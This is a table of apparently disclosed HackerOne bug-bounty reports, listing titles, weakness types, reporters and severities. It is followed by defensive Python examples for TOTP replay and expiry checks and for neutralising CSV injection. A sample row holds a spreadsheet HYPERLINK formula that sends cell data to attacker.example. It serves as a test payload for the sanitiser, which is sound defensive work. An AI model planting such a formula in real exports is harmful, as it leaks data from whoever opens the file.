| Title | Weakness | Reporter | Severity | Date |
|---|---|---|---|---|
| Residual Malicious Payloads on HackerOne after Vulnerability Fixes | Improper Input Validation | joejoe5 | Medium | 2026-04-16 |
| DOS via Mutation Aliasing in GraphQL Account Recovery Phone Number Verification API | None supplied | hellokbit | No rating | 2026-04-16 |
| Lack of Validation in Reward Redemption Allows Unlimited Burp Suite License Abuse | Improper Access Control - Generic | theokeen | Low | 2026-03-18 |
| Internal Access to Hackerone confluence Docs | Misconfiguration | madara_ | High | 2025-08-15 |
| Account takeover of existing HackerOne accounts through SCIM provisioning | Improper Access Control - Generic | boy_child_ | High | 2025-07-17 |
| Banned user still has access to their deleted account via HackerOne's API using their API key | Improper Access Control - Generic | mrmax4o4 | Medium | 2025-07-14 |
| IDOR Vulnerability at AddTagToAssets operation name | Insecure Direct Object Reference (IDOR) | root_geek280 | Medium | 2025-06-08 |
| Public GitHub repositories for multiple HackerOne managed triage team profiles contain private HackerOne reports information | Information Disclosure | w2w | Medium | 2025-05-31 |
| Ability to access policy and updates for unauthorized program | Improper Access Control - Generic | light3r | Medium | 2025-05-08 |
| The /reports/:id.json endpoint discloses potentially sensitive user attributes when reporter summary is present | Information Disclosure | avinash_ | Critical | 2025-04-01 |
| Domain highlighting on External link warning is not working on Chrome & Microsoft Edge browsers on Mobile | Violation of Secure Design Principles | sarthakbhingare015 | Low | 2025-03-13 |
| Disclosing PolicyPageAssetGroup in Private Programs via /graphql `gid://hackerone/PolicyPageAssetGroupsIndex::PolicyPageAssetGroup/{id}` | None supplied | haxta4ok00 | Critical | 2025-01-21 |
| Access to limited confidential information of private program as an Ex-reporter, Report Participant (external user) & Ex-staff member | Improper Access Control - Generic | sarthakbhingare015 | Low | 2024-12-24 |
| Hackerone supports accounts organization takeover | None supplied | madara_ | Medium | 2024-11-19 |
| Takeover of hackerone.engineering via Medium | Reliance on Reverse DNS Resolution for a Security-Critical Action | raditz | Low | 2024-11-14 |
| Bypassing HackerOne 2FA due to race condition | Business Logic Errors | akashhamal0x01 | Medium | 2024-10-30 |
| Inviting collaborator using email discloses the hackerone account related to the user | Information Disclosure | raymatp | Medium | 2024-09-19 |
| Issue with VDP Program's Transition to Private Status and Missing Warning Labels on ORG Invitation | None supplied | harshdranjan | Medium | 2024-09-19 |
| Bypass comment restriction | Improper Access Control - Generic | retat4 | Medium | 2024-09-19 |
| Private draft report exposure in a program a user is added as a viewer to | Information Disclosure | jay | Medium | 2024-09-17 |
| Private data related to program exposed via /reports/<id>.json endpoint to external user participant | Information Disclosure | saurabhb | Medium | 2024-08-30 |
| Payload delivery via Social Media urls on H1 profile | Remote File Inclusion | tedix | Medium | 2024-07-23 |
| Non Org Admin/Group Manager can create groups in an organization | Privilege Escalation | akashhamal0x01 | High | 2024-07-23 |
| Minor security issue with Hackerone Invitations from sandbox program | Business Logic Errors | iam_srpk | Low | 2024-07-22 |
| TOTP Authenticator implementation Accepts Expired Codes | Improper Authentication - Generic | noob_but_cut3 | High | 2024-07-11 |
| Reports submitted by a user account without 2FA set up can be transferred to a program requiring 2FA for submission | Improper Access Control - Generic | aloneh1 | Low | 2024-07-11 |
| 2fa can't be activated on app.pullrequest.com | Violation of Secure Design Principles | iam_srpk | None | 2024-07-11 |
| Two factor authentication bypass | None supplied | pranshux0x_ | Medium | 2024-07-11 |
| Session Does Not Expire / 2FA Bypass | Insufficient Session Expiration | blackflyhunter | Medium | 2024-07-11 |
| 2FA Bypass via Leaked Cookies | Improper Authentication - Generic | deepmarketer | Medium | 2024-07-11 |
| Two-factor authentication bypass leads to information disclosure about the program and all participating hackers | Information Disclosure | bob004x | High | 2024-07-11 |
| Reset the 2FA of the user which can lead to Account Takeover | Improper Access Control - Generic | 5zdob13 | Medium | 2024-07-11 |
| Bypassing the victim's phone number OTP in the account recovery process on https://hackerone.com/settings/auth/setup_account_recovery | Improper Authentication - Generic | the-white-evil | Critical | 2024-07-11 |
| 2FA requirement bypass when claiming bounty | Business Logic Errors | raymatp | No rating | 2024-07-11 |
| Improper Authentication - 2FA OTP Reusable | Improper Authentication - Generic | xklepxn | High | 2024-07-11 |
| Bypassing Two-Factor Authentication via Account Deactivation and Password Reset | Improper Access Control - Generic | 011alsanosi | None | 2024-07-11 |
| Business Logic error leads to bypass of 2FA requirement | Business Logic Errors | abdulprkr | High | 2024-07-11 |
| Hackers can Invite Collaborators Without 2FA on Programs Requiring 2FA | None supplied | anish-kosaraju | Medium | 2024-07-11 |
| Ability to identify actual private from sandboxed programs using link hackerone.com/$handle/terms_acceptance_data.csv | Improper Access Control - Generic | ketr0it | Medium | 2024-06-20 |
| Program Member Could Duplicate Report To A Non Related Program Original Report | Improper Access Control - Generic | v0id1 | High | 2024-06-19 |
| "package_name" can be set as desired when submitting a Pentest Opportunity form | Improper Access Control - Generic | iam_srpk | Medium | 2024-06-19 |
| [IDOR] Improper Access Control on Embedded Submission Form | Insecure Direct Object Reference (IDOR) | japz | Low | 2024-06-19 |
| Ability to bulk submit reports via query name based batching | Violation of Secure Design Principles | 0x999 | Low | 2024-06-19 |
| Access Control Vulnerability Enabling Unauthorized Access to Limited Disclosure Reports | Improper Access Control - Generic | akashhamal0x01 | High | 2024-06-17 |
| [Spot Check] - Ability to disclose metadata about Spot Checks (Number of Hackers + Hackers Criteria) via "SpotCheckSingleQuery" | Information Disclosure | nagli | Medium | 2024-06-11 |
| [ Spot Check ] Team members can edit a user's write-up | Improper Access Control - Generic | youstin | Low | 2024-06-06 |
| [hackerone.com] Program's old handles are not blacklisted like usernames and allow reclaiming past handles for potential abuse | Violation of Secure Design Principles | zy9ard3 | Medium | 2024-05-30 |
| LLM03: Training Data Poisoning via ASCII decoding | LLM01: Prompt Injection | hacktus | None | 2024-05-28 |
| Inadequate redaction exposes sensitive information via the "ShareReportViaEmail" GraphQL endpoint | None supplied | iambouali | Medium | 2024-05-24 |
| Insecure Direct Object Reference (IDOR) Allows Viewing Private Report Details via /bugs.json Endpoint | Insecure Direct Object Reference (IDOR) | bate5a | Critical | 2024-05-23 |
| Able to Create Testimonials for myself using Sandbox | Improper Access Control - Generic | harshdranjan | Medium | 2024-05-22 |
| Any user could upload attachments to pentest scoping form they don't have access to | Business Logic Errors | hillybott | High | 2024-05-15 |
| LLM01: Invisible Prompt Injection | LLM01: Prompt Injection | hacktus | Medium | 2024-05-13 |
| Possible PII Disclosure via Advanced Vetting Process - ██████ | Information Disclosure | darkc0d3 | Medium | 2024-05-13 |
| Cloud Computer Hackerone Triager can be Accessible for everyone [[email protected]] computer | Business Logic Errors | lu3ky-13 | None | 2024-05-10 |
| Confirmed #2118458: Intentional redirect from www.hackerone.com to domain which is up for sale | None supplied | sarthakbhingare015 | Low | 2024-05-09 |
| Attachment disclosure via summary report | Insecure Direct Object Reference (IDOR) | xklepxn | Critical | 2024-04-29 |
| New Hacktivity features: Bounty rewards leakage where programs don't decide to disclose bounty in limited disclosure report | Information Disclosure | nitsec7 | Medium | 2024-03-28 |
| Creation of bounties through Customer API leads to private email disclosure | Information Disclosure | 0v3rw4tch | Critical | 2024-03-26 |
| View any user email using the Team's audit log section | Information Disclosure | 0v3rw4tch | Critical | 2024-03-26 |
| Being able to disclose IBB bounty table of any public program | Information Disclosure | akashhamal0x01 | Medium | 2024-03-17 |
| Program admins could add verified domains to an organization | Improper Access Control - Generic | hillybott | Low | 2024-03-07 |
| Account creation with invalid email addresses / email is accepting % and %0d%0a line termination chars | Violation of Secure Design Principles | resett3r | Low | 2024-02-04 |
| HackerOne SAML signup domain enforcement bypass results in unauthorized access to HackerOne PullRequest organization | Improper Null Termination | 0xacb | High | 2024-02-04 |
| Server Side Request Forgery (SSRF) in webhook functionality | Server-Side Request Forgery (SSRF) | madara_ | Medium | 2024-01-30 |
| Some limited confidential information can still be accessed after a user exits a private program | Information Disclosure | brazil1 | Medium | 2024-01-19 |
| View Titles of Private Reports with pending email invitation | Improper Access Control - Generic | ahacker1 | High | 2024-01-16 |
| An attacker can submit a Pentest Opportunity and change the status of the opportunity from submitted to in_review or reviewed | Improper Access Control - Generic | marvelmaniac | Medium | 2024-01-04 |
| How the Arch Angel stole Live Events | None supplied | archangel | None | 2023-12-15 |
| Server Side Request Forgery (SSRF) via Analytics Reports | Server-Side Request Forgery (SSRF) | hacker1_agent | Critical | 2023-12-08 |
| Private program name disclosure in the invitation mail for another program | Information Disclosure | byq | Low | 2023-12-08 |
| Organization members can delete reports in teams they have no access to | Improper Access Control - Generic | 0v3rw4tch | Medium | 2023-11-22 |
| Google Docs link in JS files allows editing & reading survey information | Information Disclosure | bebiks | Medium | 2023-11-04 |
| Bypass report submit restriction/ban using the API key | Privilege Escalation | light3r | Medium | 2023-10-29 |
| IDOR vulnerability in unreleased HackerOne Copilot feature | Insecure Direct Object Reference (IDOR) | bebiks | Medium | 2023-10-25 |
| New Search Feature: Search for non-public words in limited disclosure reports | Information Disclosure | ahacker1 | Medium | 2023-10-25 |
| Hacker email disclosed on submission at hackerone Hacktivity | Information Disclosure | xdemiray | Low | 2023-10-24 |
| Hacker's two emails disclosed on submission at hackerone Hacktivity | Information Disclosure | inscryption | No rating | 2023-10-18 |
| Draft report exposure via Slack alerting system for programs | Information Disclosure | imranhudaa | Medium | 2023-10-06 |
| Able to see Bonus amount given to a report even if the bounty and Bonus is not visible to public or mentioned in {Report-Id}.json | Information Disclosure | harshdranjan | Medium | 2023-09-14 |
| IDOR: Authorization Bypass in LockReport Mutation for public reports | Improper Access Control - Generic | 0v3rw4tch | Medium | 2023-09-13 |
| Unauthorized Ticket can be created by an Attacker in user's Helpdesk account | None supplied | fanimalikhack | None | 2023-09-08 |
| Support Tickets can be created on behalf of other users using spoofed email \| Bypass of #2001913 | Incorrect Authorization | as_patro | None | 2023-09-08 |
| Triager/Team members can edit hacker's report and hacker is not even notified | None supplied | kalkii | Medium | 2023-08-31 |
| Names not completely redacted despite "Redact the names of the involved users" being selected | Information Disclosure | japz | Low | 2023-08-29 |
| IDOR - Delete all Licenses and certifications from user's account using CreateOrUpdateHackerCertification GraphQL query | Insecure Direct Object Reference (IDOR) | harshdranjan | High | 2023-08-29 |
| Staff and Triage can modify the initial post of a report, including already disclosed reports | Improper Access Control - Generic | zerotea | Medium | 2023-08-28 |
| Bypass of #2035332 RXSS at image.hackerone.live via the `url` parameter | Cross-site Scripting (XSS) - Reflected | sudi | Low | 2023-08-22 |
| Hackerone All Private Program Name Leaked to Public Via Collaborator OR Attacker can Easily Dump all Private Program Names through Collaborator | Information Disclosure | hackit_bharat | Medium | 2023-08-11 |
| RXSS at image.hackerone.live via the `url` parameter | Cross-site Scripting (XSS) - Reflected | todayisnew | Low | 2023-08-11 |
| Create miscellaneous support ticket on anyone's account through [email protected] email | Misconfiguration | sayaanalam | None | 2023-08-11 |
| HackerOne Support System Doesn't Require Any Authentication, May Lead to Unauthorized Action | Misconfiguration | rafsanzami | None | 2023-08-11 |
| Usernames still visible on report export PDF despite "I want to redact all usernames" being selected | Information Disclosure | japz | Low | 2023-08-08 |
| Takeover of hackerone.engineering via Github | Privilege Escalation | m0chan | Medium | 2023-07-31 |
| Register & create a ticket as somebody else on HackerOne Support | Misconfiguration | slothzap | None | 2023-07-31 |
| Asset Inventory Internal Descriptions are leaked in CSV export | Business Logic Errors | archangel | Medium | 2023-07-12 |
| 2M Reports on HackerOne Celebration! - Ability to bulk-submit many reports. | Misconfiguration | nagli | Low | 2023-07-11 |
| Banned user still able to be invited to reports as a collaborator and reset the password | Improper Access Control - Generic | light3r | Medium | 2023-07-06 |
| Internal machine learning API endpoint for CWE classification is vulnerable to path traversal | Path Traversal | jobert | Medium | 2023-07-05 |
| An attacker can view any hacker email via /SaveCollaboratorsMutation operation name | Information Disclosure | 0xrayan1996 | High | 2023-07-04 |
| Improper CSRF token validation allows attackers to access victim's accounts linked to Hackerone | Cross-Site Request Forgery (CSRF) | medmahmoudi | High | 2023-06-19 |
| Attachment in published HackerOne report exposes private program | Information Disclosure | mateuszek | Low | 2023-06-07 |
| Anyone can view collaborator email address via path /reports/<id>/participants | Improper Access Control - Generic | aloneh1_breecher | Low | 2023-06-01 |
| Program managers can see draft reports using Export Reports feature | Business Logic Errors | alp | Low | 2023-05-18 |
| HTML injection in email at https://www.hackerone.com/ | Code Injection | iamr0000t | Low | 2023-05-12 |
| Insecure Direct Object Reference (IDOR) - Delete Campaigns | Insecure Direct Object Reference (IDOR) | datph4m | High | 2023-05-03 |
| Adding h1_analyst_* to username for normal users | Business Logic Errors | refaat01 | Low | 2023-04-12 |
| [CVE-2022-44268] Arbitrary Remote Leak via ImageMagick | Remote File Inclusion | mikkocarreon | Critical | 2023-03-16 |
| Information disclosure of another company's bug on video | Information Disclosure | mundre_07 | Low | 2023-03-12 |
| Stored XSS on www.hackerone.com due to deleted S3-bucket from old page_widget | Cross-site Scripting (XSS) - Stored | fransrosen | Medium | 2023-03-10 |
| Scope information is leaked when visiting policy scopes tab of any External Program | Improper Access Control - Generic | buraaqsec | Medium | 2023-03-10 |
| SQL Injection in CVE Discovery Search | SQL Injection | rcoleman | High | 2023-03-06 |
| Users querying dim_hacker_reports table through Analytics API can determine data from dim_reports table using WHERE or HAVING query | Information Disclosure | jobert | Medium | 2023-02-22 |
| HTML injection that may lead to XSS on HackerOne.com through H1 Triage Wizard Chrome Extension | Cross-site Scripting (XSS) - Stored | jobert | Low | 2023-02-14 |
| HackerOne Undisclosed Report Leak via PoC of Full Disclosure on Hacktivity | Information Disclosure | syjane | Low | 2023-02-10 |
| Private information exposed through GraphQL search endpoints aggregates | Information Disclosure | reigertje | Medium | 2023-01-19 |
| Race condition in joining CTF group | Time-of-check Time-of-use (TOCTOU) Race Condition | zeyu2001 | Low | 2023-01-08 |
| Any organization's assets pending review can be downloaded | Information Disclosure | jobert | High | 2022-11-29 |
| HTML Injection in email via Name field | Cross-site Scripting (XSS) - Generic | hacker1_agent | Low | 2022-09-18 |
| Ability to escape database transaction through SQL injection, leading to arbitrary code execution | SQL Injection | jobert | High | 2022-08-09 |
| June 2022 Incident Report | None supplied | jobert | Critical | 2022-07-01 |
| Blind XSS in app.pullrequest.com/████████ via /reviews/ratings/{uuid} | Cross-site Scripting (XSS) - Generic | bugra | High | 2022-05-25 |
| An attacker can archive and unarchive any structured scope object on HackerOne | None supplied | ahacker1 | High | 2022-04-18 |
| [Bypass] Ability to invite a new member in sandbox Organization | Business Logic Errors | 0619 | Medium | 2022-04-14 |
| Private invitation links/tokens leak to third-party analytics site | Information Disclosure | bigbug | Low | 2022-04-05 |
| Attachment references in markdown don't warn before downloading | Open Redirect | iamr0000t | Low | 2022-02-25 |
| Static files on HackerOne.com can be made inaccessible through Cache Poisoning attack | Uncontrolled Resource Consumption | youstin | Medium | 2021-12-22 |
| Leaked H1's Employees Email addresses, meeting info on private bug bounty program ████████ | Information Disclosure | superman85 | Medium | 2021-11-08 |
| HackerOne Staging uses Production data for testing | Privacy Violation | tk0 | Low | 2021-11-05 |
| Temporarily banned user (from platform) is able to make submissions via embedded submission forms | Business Logic Errors | muon4 | Low | 2021-09-22 |
| CSV injection in the credentials export | Violation of Secure Design Principles | muon4 | None | 2021-09-22 |
| Race condition allows sending feedback for the hacker multiple times | Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') | muon4 | Low | 2021-09-22 |
| Users who are banned from program can still be invited to new reports as collaborators | Business Logic Errors | muon4 | Low | 2021-09-22 |
| Used email confirmation link reveals the email address which is tied to it | Information Disclosure | muon4 | None | 2021-09-22 |
| Hacker can bypass minimum bounty amount restrictions in "invitation preferences" setting via UpdateInvitationPreferencesMutation GraphQL operation | Client-Side Enforcement of Server-Side Security | frozensolid | Low | 2021-09-20 |
| Enumerating HackerOne Pentests | Misconfiguration | whhackersbr | Low | 2021-08-25 |
| Disclosure of private program handle with external link | None supplied | haxta4ok00 | Medium | 2021-08-24 |
| Attachment object in GraphQL continues to grant access to files, even if they are removed from rendering | Information Disclosure | haxta4ok00 | Medium | 2021-08-24 |
| Hackers can find out the ID of private programs | Information Disclosure | haxta4ok00 | Low | 2021-08-24 |
| The possibility of disrupting the normal operation of frontend using markdown | Denial of Service | haxta4ok00 | Low | 2021-08-24 |
| Hackers can reveal the names of private programs that have an external link | Information Disclosure | haxta4ok00 | Low | 2021-08-24 |
| Hackers can reveal the names of private programs that have an external link and Enterprise Product Edition | Information Disclosure | haxta4ok00 | Low | 2021-08-24 |
| Tab nabbing in Hackerone inbox | Open Redirect | adhamsadaqah | Low | 2021-08-09 |
| PII data Leakage through hackerone reports | Information Disclosure | iamr0000t | Low | 2021-08-09 |
| Partial report contents leakage - via HTTP/2 concurrent stream handling | Information Disclosure | tomvg | Medium | 2021-08-05 |
| Private program disclosure through notifications | Improper Access Control - Generic | sunil_yedla | Low | 2021-08-05 |
| Mishandling of hackerone clear background checks resulting in disclosure of other hackers' information | Off-by-one Error | frozensolid | Medium | 2021-08-05 |
| Internal Gitlab Ticket Disclosure via External Slack Channels | Information Disclosure | none_of_the_above | High | 2021-08-04 |
| Information disclosure - Feedback is accessible on Public profile even after 'disallowed' at https://hackerone.com/settings/feedback | Information Disclosure | brdoors3 | Low | 2021-08-03 |
| Slack integration setup lacks CSRF protection | Cross-Site Request Forgery (CSRF) | whhackersbr | High | 2021-07-07 |
| New link opening method makes hackerone vulnerable to tabnabbing | Open Redirect | recon_ninja | Low | 2021-07-07 |
| Report Bulk endpoint "agree-on-going-public" action may reveal Report disclosure state for invite-only programs | Information Disclosure | clubbable | Low | 2021-06-30 |
| Report Duplicate Detector can match deleted and draft reports, may disclose title and vulnerability information | Information Disclosure | jobert | Low | 2021-06-24 |
| Stored XSS in IE11 on hackerone.com via custom fields | Cross-site Scripting (XSS) - Stored | tester2020 | Medium | 2021-06-24 |
| Second-order SOQL injection through email and campaign name parameter in Salesforce lead submission | None supplied | jobert | Low | 2021-06-18 |
| HackerOne making payments in USDC (Coinbase stable coin) | None supplied | arl_rose | None | 2021-06-17 |
| Hackerone is not properly deleting user id | Business Logic Errors | hack3r_anies | Medium | 2021-06-11 |
| Private program disclosure of `██████████` through notifications | Improper Access Control - Generic | h13- | Low | 2021-06-09 |
| CSRF allows testing email forwarding | Cross-Site Request Forgery (CSRF) | muon4 | Low | 2021-05-13 |
| Lack of warning label when receiving a letter | Phishing | haxta4ok00 | Low | 2021-05-13 |
| Bypassing the External Link Warning | Open Redirect | whhackersbr | Low | 2021-05-07 |
| Editing Pentest Summary Report Answers After Submitting Them | Modification of Assumed-Immutable Data (MAID) | whhackersbr | Low | 2021-05-06 |
| Changing the 2FA secret key and backup codes without knowing the 2FA OTP | Modification of Assumed-Immutable Data (MAID) | whhackersbr | Medium | 2021-05-06 |
| Improper data update process on UpdatePhabricatorIntegration mutation leads to leak of Phabricator Conduit API token | Information Disclosure | nukedx | Critical | 2021-04-30 |
| Ability to invite a new member on Sandbox Program | Business Logic Errors | ex1st3nc3_ | Low | 2021-04-05 |
| HackerOne Jira integration plugin Leaked JWT to unauthorized Jira users | Improper Authentication - Generic | updatelap | Medium | 2021-04-01 |
| Reflected XSS and possible SSRF/XXE on https://events.hackerone.com/conferences/get_recording_slides_xml.xml?url=myserver/xss.xml | Cross-site Scripting (XSS) - Reflected | nagli | None | 2021-03-26 |
| Stored XSS on https://events.hackerone.com | Cross-site Scripting (XSS) - Stored | nagli | None | 2021-03-26 |
| Open Redirect on http://events.hackerone.com/redirect?url=https://naglinagli.github.io | Open Redirect | nagli | None | 2021-03-26 |
| Indexing of urls on the "External link warning" pages discloses many vulnerable endpoints from the past and unlisted videos/photos | Violation of Secure Design Principles | nagli | Medium | 2021-03-25 |
| Stored Cross-Site Scripting vulnerability in example Custom Digital Agreement | Cross-site Scripting (XSS) - Stored | jobert | Medium | 2021-03-18 |
| "Bounty splitting enabled" can disclose if public VDPs are running private VRP | None supplied | hundredpercent | Low | 2021-03-18 |
| Dangling cloud instance at vpn.inverselink.com | Business Logic Errors | ian | Low | 2021-03-11 |
| Security@ email forwarding and Embedded Submission drafts can be used to obtain copy of deleted attachments from other HackerOne users | Insecure Direct Object Reference (IDOR) | jobert | High | 2020-11-17 |
| Getting New Invitations without Leaving Programs | Business Logic Errors | ali | Low | 2020-10-15 |
| Email address of any user can be queried on Report Invitation GraphQL type when username is known | Improper Authorization | msdian7 | High | 2020-02-20 |
| Account takeover via leaked session cookie | Improper Authentication - Generic | haxta4ok00 | High | 2019-12-03 |
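Two of the 2FA rows above name the same pair of TOTP weaknesses by title only: a verifier that accepts expired codes, and one that lets a one-time code be used twice. The list carries no detail on how either report worked, so the following is a generic illustration added here, not code from any listed report or from HackerOne: an RFC 6238 verifier in Python that bounds the accepted time window and keeps a per-user high-water mark so that a consumed code cannot be replayed and codes from older steps are refused. The one-step skew tolerance, the six-digit length and the in-memory watermark are assumptions of the example; the shared secret used at the bottom is the RFC 6238 Appendix B test key.

```python
import hashlib
import hmac
import struct

STEP = 30    # RFC 6238 time step, in seconds
DIGITS = 6
# Assumption for this example: tolerate one step of clock skew on either side
# of the current step. Anything outside that window is an expired (or future) code.
SKEW_STEPS = 1


def hotp(secret: bytes, counter: int, digits: int = DIGITS) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over the 8-byte big-endian counter, dynamic truncation."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    binary = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(binary % (10 ** digits)).zfill(digits)


def totp(secret: bytes, now: int, step: int = STEP) -> str:
    """RFC 6238 TOTP: HOTP with the counter derived from Unix time."""
    return hotp(secret, now // step)


class TotpVerifier:
    """Server-side TOTP check that bounds the accepted window and refuses replay.

    Per-user state is only the highest time step already consumed. A code is
    accepted when its step lies in [current - skew, current + skew] and is
    strictly greater than that watermark, so the same code cannot be used twice
    inside the window and codes from older steps are rejected as expired.
    """

    def __init__(self, secret: bytes, skew_steps: int = SKEW_STEPS):
        self.secret = secret
        self.skew_steps = skew_steps
        self.last_used_step = -1  # in production persist this per user, server-side

    def verify(self, code: str, now: int) -> bool:
        if len(code) != DIGITS or not code.isdigit():
            return False
        current = now // STEP
        for step in range(current - self.skew_steps, current + self.skew_steps + 1):
            if step <= self.last_used_step:
                continue  # replay guard: consumed (or older) steps are dead
            if hmac.compare_digest(hotp(self.secret, step), code):
                self.last_used_step = step
                return True
        return False


if __name__ == "__main__":
    secret = b"12345678901234567890"   # RFC 6238 Appendix B SHA-1 test secret
    v = TotpVerifier(secret)
    code = totp(secret, 59)
    # First use at T=59 succeeds, the identical code is then refused as a replay.
    print(code, v.verify(code, 59), v.verify(code, 59))   # 287082 True False
```

The watermark approach deliberately rejects a valid code from an earlier step once a later step has been consumed; that is the intended trade-off, since the alternative (a per-code cache) has to expire entries correctly or it reintroduces the reuse bug.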
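One row above lists CSV injection in a credentials export, and another an asset-inventory CSV export that leaked internal descriptions; both are named by title only. The standard defence for the first is shown here as an added Python example that is not code from either report or from HackerOne: every user-controlled cell is neutralised before it is written, so that a value beginning with a formula trigger is read by Excel, LibreOffice or Google Sheets as text. The sample rows are constructed for the example, and the choice to leave negative numbers untouched is an assumption about what the export's data looks like.

```python
import csv
import io

# Leading characters that make a spreadsheet evaluate a cell as a formula
# (or a command launch) when the CSV file is opened.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_plain_number(s: str) -> bool:
    """True for strings that are just numbers, e.g. '-42' or '+1e3'."""
    try:
        float(s)
        return True
    except ValueError:
        return False


def neutralize_cell(value: object) -> str:
    """Render a cell so a spreadsheet reads it as text, never as a formula.

    A leading apostrophe forces text interpretation in spreadsheet apps (the
    OWASP-recommended mitigation); the csv writer then handles quoting and
    doubling of embedded quotes. Real numbers start with '-' or '+' but are
    legitimate data, so they are left alone.
    """
    s = "" if value is None else str(value)
    stripped = s.lstrip(" ")   # some importers trim leading spaces before parsing
    if stripped.startswith(FORMULA_TRIGGERS) and not is_plain_number(stripped):
        return "'" + s
    return s


def export_csv(header, rows) -> str:
    """Write an export with every user-controlled cell neutralised and every field quoted."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(header)
    for row in rows:
        writer.writerow([neutralize_cell(c) for c in row])
    return buf.getvalue()


# Constructed sample rows (not data from any real export). The first row's
# second cell is the kind of payload a hostile user can plant in a free-text
# field that later lands in a CSV opened by staff.
SAMPLE_ROWS = [
    ("alice", '=HYPERLINK("https://attacker.example/leak?d="&A1,"open")'),
    ("bob", "-42"),
    ("carol", "@SUM(1+1)"),
    ("dave", "P@ssw0rd!"),
]

if __name__ == "__main__":
    print(export_csv(("username", "secret"), SAMPLE_ROWS), end="")
```

Quoting alone is not enough: a quoted `"=1+1"` is still evaluated once the file is opened, which is why the apostrophe prefix is applied in addition to `QUOTE_ALL`.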